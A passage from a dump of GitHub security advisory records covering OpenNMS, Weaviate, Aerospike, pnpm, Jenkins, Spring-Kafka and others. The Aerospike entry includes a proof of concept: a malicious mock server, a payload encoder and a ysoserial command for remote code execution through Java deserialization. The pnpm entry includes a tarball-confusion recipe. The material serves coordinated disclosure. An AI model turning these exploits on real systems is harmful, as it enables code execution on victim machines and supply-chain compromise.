upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Erik Wynter for reporting this issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms-webapp-rest'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '31.0.8'}, {'fixed': '32.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0872'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/6354'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/e59b0ddd164cf0598ac0294d11a2d677d9e310b8'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/horizon/32/releasenotes/changelog.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]","{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:12:00Z', 'nvd_published_at': None}" 1.4.0,GHSA-8697-479h-5mfp,2023-08-24T21:49:43Z,2023-08-22T18:03:13Z,,['CVE-2023-38976'],Weaviate denial of service vulnerability,"### Impact This vulnerability is a type conversion issue that affects users of Weaviate Server versions 1.20.0 and earlier. Who is impacted: Users of Weaviate Server versions 1.20.0 and earlier are impacted by this vulnerability. ### Patches A patch has been developed for this vulnerability. Patch releases 1.20.6, 1.19.13, and 1.18.6 are fixing this vulnerability in each respective minor version release. Users are strongly recommended to upgrade to one of these patched versions to address the vulnerability. Keeping software up-to-date is crucial to avoid security vulnerabilities. ### Workarounds There are no known workarounds to fix or remediate this vulnerability without upgrading. Users must upgrade to a patched version to mitigate the risk. ### References * https://github.com/weaviate/weaviate/releases/tag/v1.18.6 * https://github.com/weaviate/weaviate/releases/tag/v1.19.13 * https://github.com/weaviate/weaviate/releases/tag/v1.20.6 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/weaviate/weaviate'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.20.0'}, {'fixed': '1.20.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/weaviate/weaviate'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.19.0'}, {'fixed': '1.19.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/weaviate/weaviate'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/security/advisories/GHSA-8697-479h-5mfp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38976'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/issues/3258'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/pull/3431'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/commit/2a7b208d9aca07e28969e3be82689c184ccf9118'}, {'type': 'PACKAGE', 'url': 'https://github.com/weaviate/weaviate'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/releases/tag/v1.18.6'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/releases/tag/v1.19.13'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/releases/tag/v1.20.6'}]","{'cwe_ids': ['CWE-704'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-22T18:03:13Z', 'nvd_published_at': None}" 1.4.0,GHSA-jj95-55cr-9597,2023-08-08T22:15:13Z,2023-08-03T19:45:39Z,,['CVE-2023-36480'],Aerospike Java Client vulnerable to unsafe deserialization of server responses,"# GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2023-044` The [GitHub Security Lab](https://securitylab.github.com) team has identified a potential security vulnerability in [Aerospike Java Client](https://github.com/aerospike/aerospike-client-java/). We are committed to working with you to help resolve this issue. In this report you will find everything you need to effectively coordinate a resolution of this issue with the GHSL team. If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2023-044` as a reference). If you are _NOT_ the correct point of contact for this report, please let us know! ## Summary The Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on. ## Product Aerospike Java Client ## Tested Version [6.1.7](https://github.com/aerospike/aerospike-client-java/releases/tag/6.1.7) ## Details ### Issue: Unsafe deserialization of server responses (`GHSL-2023-044`) The Aerospike Java client implements different ways of communicating with an Aerospike server to perform several operations. Asynchronous commands can be executed using the Netty framework using the `NettyCommand` class. This class includes an `InboundHandler` that extends Netty's `ChannelInboundHandlerAdapter`, which handles inbound data coming from the Netty channel established with the server. This is implemented in the `channelRead` method: [`client/src/com/aerospike/client/async/NettyCommand.java:1157`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157) ```java @Override public void channelRead(ChannelHandlerContext ctx, Object msg) { command.read((ByteBuf)msg); } ``` The incoming `msg` object is handled by the `NettyCommand.read` method, which behaves differently depending on the `state` variable. Several states produce paths to the vulnerable code — for instance, we will follow the path through `AsyncCommand.COMMAND_READ_HEADER`: [`/client/src/com/aerospike/client/async/NettyCommand.java:489`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489) ```java private void read(ByteBuf byteBuffer) { eventReceived = true; try { switch (state) { // --snip-- case AsyncCommand.COMMAND_READ_HEADER: if (command.isSingle) { readSingleHeader(byteBuffer); } // --snip-- } // --snip-- } // --snip--- } ``` Some bytes are read from the message buffer and saved in `command.dataBuffer` in the `readSingleHeader` method, after which `parseSingleBody` is called: [`client/src/com/aerospike/client/async/NettyCommand.java:596`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596) ```java private void readSingleHeader(ByteBuf byteBuffer) { int readableBytes = byteBuffer.readableBytes(); int dataSize = command.dataOffset + readableBytes; // --snip-- byteBuffer.readBytes(command.dataBuffer, 0, dataSize); command.dataOffset = dataSize; if (command.dataOffset >= receiveSize) { parseSingleBody(); } } ``` `parseSingleBody` simply delegates on `AsyncCommand.parseCommandResult`, which unless the message is compressed, directly calls `AsyncCommand.parseResult`. The implementation of this method depends on the command type. For an `AsyncRead` command, we have the following: [`client/src/com/aerospike/client/async/AsyncRead.java:68`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68) ```java @Override protected final boolean parseResult() { validateHeaderSize(); int resultCode = dataBuffer[dataOffset + 5] & 0xFF; int generation = Buffer.bytesToInt(dataBuffer, dataOffset + 6); int expiration = Buffer.bytesToInt(dataBuffer, dataOffset + 10); int fieldCount = Buffer.bytesToShort(dataBuffer, dataOffset + 18); int opCount = Buffer.bytesToShort(dataBuffer, dataOffset + 20); dataOffset += Command.MSG_REMAINING_HEADER_SIZE; if (resultCode == 0) { // --snip-- skipKey(fieldCount); record = parseRecord(opCount, generation, expiration, isOperation); return true; } ``` It can be seen that several fields are read from the message's bytes, and then a call to `Command.parseRecord` happens: [`client/src/com/aerospike/client/command/Command.java:2083`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083) ```java protected final Record parseRecord( int opCount, int generation, int expiration, boolean isOperation ) { Map bins = new LinkedHashMap<>(); for (int i = 0 ; i < opCount; i++) { int opSize = Buffer.bytesToInt(dataBuffer, dataOffset); byte particleType = dataBuffer[dataOffset + 5]; byte nameSize = dataBuffer[dataOffset + 7]; String name = Buffer.utf8ToString(dataBuffer, dataOffset + 8, nameSize); dataOffset += 4 + 4 + nameSize; int particleBytesSize = opSize - (4 + nameSize); Object value = Buffer.bytesToParticle(particleType, dataBuffer, dataOffset, particleBytesSize); ``` `Buffer.bytesToParticle` converts the remaining bytes in the data buffer depending on the `particleType` field. We're interested in the `JBLOB` case: [`client/src/com/aerospike/client/command/Buffer.java:53`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53) ```java public static Object bytesToParticle(int type, byte[] buf, int offset, int len) throws AerospikeException { switch (type) { // --snip-- case ParticleType.JBLOB: return Buffer.bytesToObject(buf, offset, len); ``` In `bytesToObject`, the deserialization of an object from the message bytes happens: [`client/src/com/aerospike/client/command/Buffer.java:300`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L300) ```java public static Object bytesToObject(byte[] buf, int offset, int length) { // --snip-- try (ByteArrayInputStream bastream = new ByteArrayInputStream(buf, offset, length)) { try (ObjectInputStream oistream = new ObjectInputStream(bastream)) { return oistream.readObject(); } } // --snip-- } ``` NOTE: Take into account that there exists a similar sink, that can be reached in a similar way, in `Unpacker.unpackBlock`: [`client/src/com/aerospike/client/util/Unpacker.java:227`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227) ```java private T unpackBlob(int count) throws IOException, ClassNotFoundException { // --snip-- case ParticleType.JBLOB: // --snip-- try (ByteArrayInputStream bastream = new ByteArrayInputStream(buffer, offset, count)) { try (ObjectInputStream oistream = new ObjectInputStream(bastream)) { val = getJavaBlob(oistream.readObject()); } } ``` This vulnerability was discovered with the help of [CodeQL](https://codeql.github.com/). #### Impact This issue may lead to Remote Code Execution (RCE) in the Java client. #### Remediation Avoid deserialization of untrusted data if at all possible. If the architecture permits it then use other formats instead of serialized objects, for example JSON or XML. However, these formats should not be deserialized into complex objects because this provides further opportunities for attack. For example, XML-based deserialization attacks are possible through libraries such as XStream and XmlDecoder. Alternatively, a tightly controlled whitelist can limit the vulnerability of code but be aware of the existence of so-called Bypass Gadgets, which can circumvent such protection measures. #### Resources To exploit this vulnerability, a malicious Aerospike server is needed. For the sake of simplicity, we implemented a mock server with hardcoded responses, with the only goal of reaching the vulnerable code of the client. To be able to easily reproduce this, we used the client's examples with the `-netty` flag, specifically the `AsyncPutGet`, which uses an `AsyncRead`. The examples point to `localhost:3000` by default, so we set up a simple Netty TCP server listening on that port, which replicates responses previously intercepted from a real Aerospike server and returns them to the client, until the `AsyncRead` command happens. Then, our server injects the malicious response: ```java public class AttackChannelHandler extends SimpleChannelInboundHandler { @Override protected void channelRead0(ChannelHandlerContext ctx, String s) throws Exception { // --snip-- if (s.getBytes()[7] == 0x44) { AttackMessage m = new AttackMessage( Files.readAllBytes(Paths.get(""location/of/deserialization/payload.bin""))); ctx.channel().writeAndFlush(m); return; } // --snip-- } } ``` `AttackMessage` is a class that hardcodes the necessary data to deliver the payload: ```java public class AttackMessage { private byte resultCode = 0; private int generation = 2; private int expiration = 417523457; private short fieldCount = 0; private short opCount = 1; private byte particleType = 7; private String name = ""putgetbin""; private byte[] payload; public AttackMessage(byte[] payload) { this.payload = payload; } // --snip-- (getters) public int[] getSize() { int size = 30 + name.length() + payload.length; int low = (byte) (size & 0xFF); int high = (byte) (size >> 8) & 0xFF; return new int[] {high, low}; } public int getOpSize() { return payload.length + 4 + name.length(); } public byte[] getPayload() { return payload; } } ``` And it's finally encoded and delivered to the client through the network using a `MessageToByteEncoder` from Netty: ```java public class AttackMessageEncoder extends MessageToByteEncoder { @Override protected void encode(ChannelHandlerContext ctx, AttackMessage msg, ByteBuf out) throws Exception { // header out.writeBytes(new byte[] {0x02, 0x03, 0x00, 0x00, 0x00, 0x00}); int[] length = msg.getSize(); out.writeByte(length[0]); out.writeByte(length[1]); out.writeBytes(new byte[] {0x16, 0x00, 0x00, 0x00, 0x00}); out.writeByte(msg.getResultCode()); out.writeInt(msg.getGeneration()); out.writeInt(msg.getExpiration()); out.writeBytes(new byte[] {0x00, 0x00, 0x00, 0x00}); out.writeShort(msg.getFieldCount()); out.writeShort(msg.getOpCount()); out.writeInt(msg.getOpSize()); out.writeByte(0x01); out.writeByte(msg.getParticleType()); out.writeByte(0x00); out.writeByte(msg.getName().length()); out.writeCharSequence(msg.getName(), Charset.defaultCharset()); out.writeBytes(msg.getPayload()); } } ``` The specific deserialization payload that needs to be used depends on the deserialization gadgets available in the classpath of the application using the Aerospike client. Again, for simplicity, we assumed the victim application uses Apache Commons Collections 4.0, which contains a well-known deserialization gadget: ```xml org.apache.commons commons-collections4 4.0 ``` In which case, the malicious payload file could be generated using [`ysoserial`](https://github.com/frohoff/ysoserial) as follows: ``` java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 '/System/Applications/Calculator.app/Contents/MacOS/Calculator' > payload.bin ``` ## GitHub Security Advisories We recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for this finding. This also allows you to invite the GHSL team to collaborate and further discuss this finding in private before it is [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory). ## Credit This issue was discovered and reported by the GitHub CodeQL team members [@atorralba (Tony Torralba)](https://github.com/atorralba) and [@joefarebrother (Joseph Farebrother)](https://github.com/joefarebrother). ## Contact You can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2023-044` in any communication regarding this issue. ## Disclosure Policy This report is subject to our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.aerospike:aerospike-client'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.2.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.aerospike:aerospike-client'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.aerospike:aerospike-client'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36480'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900'}, {'type': 'PACKAGE', 'url': 'https://github.com/aerospike/aerospike-client-java'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227'}, {'type': 'WEB', 'url': 'https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T19:45:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-37xq-q42p-rv3p,2023-08-24T22:18:39Z,2023-08-24T22:18:39Z,,[],ntpd has Dependency on Vulnerable Third-Party Component,"### During startup, an attacker that can man-in-the-middle traffic to and from NTS key exchange servers can trigger a very expensive key validation process due to a vulnerability in webpki. ### Impact This vulnerability can lead to excessive cpu usage on startup on clients configured to use NTS ### Patches Affected users are recommended to upgrade to version 0.3.7 ### References See also https://github.com/rustsec/advisory-db/blob/main/crates/rustls-webpki/RUSTSEC-2023-0053.md ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ntpd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pendulum-project/ntpd-rs/security/advisories/GHSA-37xq-q42p-rv3p'}, {'type': 'WEB', 'url': 'https://github.com/pendulum-project/ntpd-rs/commit/927952a440176a18f3ded132eb831ae7f7ac5c00'}, {'type': 'PACKAGE', 'url': 'https://github.com/pendulum-project/ntpd-rs'}, {'type': 'WEB', 'url': 'https://github.com/rustsec/advisory-db/blob/main/crates/rustls-webpki/RUSTSEC-2023-0053.md'}]","{'cwe_ids': ['CWE-1395'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-08-24T22:18:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-c2cc-3569-6jh2,2023-09-06T21:05:41Z,2023-08-31T00:30:17Z,,['CVE-2023-39138'],Path traversal in ZIPFoundation,An issue in ZIPFoundation v0.9.16 allows attackers to execute a path traversal via extracting a crafted zip file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/weichsel/ZIPFoundation'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.9.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39138'}, {'type': 'WEB', 'url': 'https://github.com/weichsel/ZIPFoundation/issues/282'}, {'type': 'WEB', 'url': 'https://blog.ostorlab.co/zip-packages-exploitation.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/weichsel/ZIPFoundation'}, {'type': 'WEB', 'url': 'https://ostorlab.co/vulndb/advisory/OVE-2023-4'}, {'type': 'WEB', 'url': 'https://ostorlab.co/vulndb/advisory/OVE-2023-6'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-31T01:44:43Z', 'nvd_published_at': None}" 1.4.0,GHSA-5r98-f33j-g8h7,2023-08-01T17:00:55Z,2023-08-01T17:00:55Z,,['CVE-2023-37478'],pnpm incorrectly parses tar archives relative to specification,"### Summary It is possible to construct a tarball that, when installed via npm or parsed by the registry is safe, but when installed via pnpm is malicious, due to how pnpm parses tar archives. ### Details The TAR format is an append-only archive format, and as such, the specification for how to update a file is to add a new record to the end with the updated version of the file. This means that it is completely valid for an archive to contain multiple copies of, say, `package.json`, and the expected behavior when extracting is that all versions other than the last get ignored. This is further complicated by that during tarball extraction, all package managers are configured to drop the first path component, so collisions can be created simply by using multiple root folders in the archive, even without performing updates. When pnpm extracts a tar archive via tar-stream, it appears to extract only the _first_ file of a given name and discards all subsequent files with the same name. ### PoC Create a root folder with the following layout: - `a/package.json` - `package/package.json` - `z/package.json` File contents: #### a/package.json ```json { ""name"": ""test-package"", ""version"": ""0.1.0"", ""description"": ""This is a bad version of a test package"", ""dependencies"": { ""react"": ""^15"" } } ``` #### package/package.json ```json { ""name"": ""test-package"", ""version"": ""0.1.0"", ""description"": ""This is a bad version of a test package"", ""dependencies"": { ""react"": ""^16"" } } ``` #### z/package.json ```json { ""name"": ""test-package"", ""version"": ""0.1.0"", ""description"": ""This is the good version of a test package"", ""dependencies"": { ""react"": ""^17"" } } ``` Then use the tar binary to produce a tarball (working directory is the root folder): `tar -c -z --format ustar -f package.tgz a package z` The order of the folders at the end matters; whichever one is last will end up being the package.json that wins when extracted by npm; the one that is first will be the one that wins when extracted by pnpm. Install the tarball via the `file:` protocol. Observe that with npm, the lockfile has `react@17`, while with pnpm it has `react@15`. ### Impact This can result in a package that appears safe on the npm registry or when installed via npm being replaced with a compromised or malicious version when installed via pnpm.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'pnpm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/exe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linux-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linux-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linuxstatic-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/macos-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/macos-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/cafs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'pnpm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/exe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linux-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linux-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linuxstatic-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/macos-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/macos-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pnpm/pnpm/security/advisories/GHSA-5r98-f33j-g8h7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37478'}, {'type': 'PACKAGE', 'url': 'https://github.com/pnpm/pnpm'}, {'type': 'WEB', 'url': 'https://github.com/pnpm/pnpm/releases/tag/v7.33.4'}, {'type': 'WEB', 'url': 'https://github.com/pnpm/pnpm/releases/tag/v8.6.8'}]","{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T17:00:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-22c3-whjv-hrfm,2023-08-16T21:14:04Z,2023-08-16T15:30:17Z,,['CVE-2023-40337'],Jenkins Folders Plugin cross-site request forgery vulnerability,"Jenkins Folders Plugin 6.846.v23698686f0f6 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability. This vulnerability allows attackers to copy a view inside a folder. Folders Plugin 6.848.ve3b_fd7839a_81 requires POST requests for the affected HTTP endpoint.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:cloudbees-folder'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.848.ve3b'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40337'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3105'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:14:04Z', 'nvd_published_at': None}" 1.4.0,GHSA-crqf-q9fp-hwjw,2023-08-29T22:17:18Z,2023-08-24T15:31:10Z,,['CVE-2023-34040'],Spring-Kafka has Java Deserialization vulnerability When Improperly Configured,"In Spring for Apache Kafka 3.0.9 and earlier and versions 2.9.10 and earlier, a possible deserialization attack vector existed, but only if unusual configuration was applied. An attacker would have to construct a malicious serialized object in one of the deserialization exception record headers. Specifically, an application is vulnerable when all of the following are true: * The user does not configure an ErrorHandlingDeserializer for the key and/or value of the record * The user explicitly sets container properties checkDeserExWhenKeyNull and/or checkDeserExWhenValueNull container properties to true. * The user allows untrusted sources to publish to a Kafka topic By default, these properties are false, and the container only attempts to deserialize the headers if an ErrorHandlingDeserializer is configured. The ErrorHandlingDeserializer prevents the vulnerability by removing any such malicious headers before processing the record.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.kafka:spring-kafka'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.9.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.kafka:spring-kafka'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34040'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-kafka/commit/25ac793a78725e2ca4a3a2888a1506a4bfcf0c9d'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-kafka/commit/eb779679812f61a8553ced3d0e4069dca65560ed'}, {'type': 'PACKAGE', 'url': 'https://github.com/spring-projects/spring-kafka'}, {'type': 'WEB', 'url': 'https://spring.io/security/cve-2023-34040'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-24T22:28:48Z', 'nvd_published_at': None}" 